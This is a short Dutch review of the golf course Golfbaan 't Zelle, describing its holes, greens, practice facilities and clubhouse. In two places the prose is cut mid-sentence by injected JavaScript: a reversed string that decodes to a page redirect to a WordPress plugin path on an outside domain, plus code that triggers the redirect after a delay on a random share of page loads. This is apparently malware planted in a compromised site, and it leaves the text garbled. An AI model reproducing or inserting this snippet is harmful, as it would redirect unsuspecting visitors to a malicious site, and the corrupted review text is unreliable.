Prachtige 18-holes golfbaan in een mooi Achterhoeks coulisselandschap met eigenlijk alleen maar uitdagende holes. Heel veel afwisseling.
Mooie lange par 5 2e, verraderlijke par 4 7e, de ‘ga ik er voor of speel ik op safe’ par4 10e, de dubbele toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dogleg en hele lange par 5 11e , en last but not least de par4 17e, een pittige en risicovolle hole waar je veel kunt winnen en verliezen.
De greens zijn uitstekend, snel en glooiend, maar altijd fair.
Prima oefenfaciliteiten, vriendelijke ontvangst in de shop en toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}door de marshal. Onderhoud van de baan is echt erg goed.
En na afloop een uitstekende ontvangst in het gezellige, mooie clubhuis ” Zellerij”.  Prima sfeer, lekker biertje en een overheerlijke schaal hapjes.

Golfbaan ’t Zelle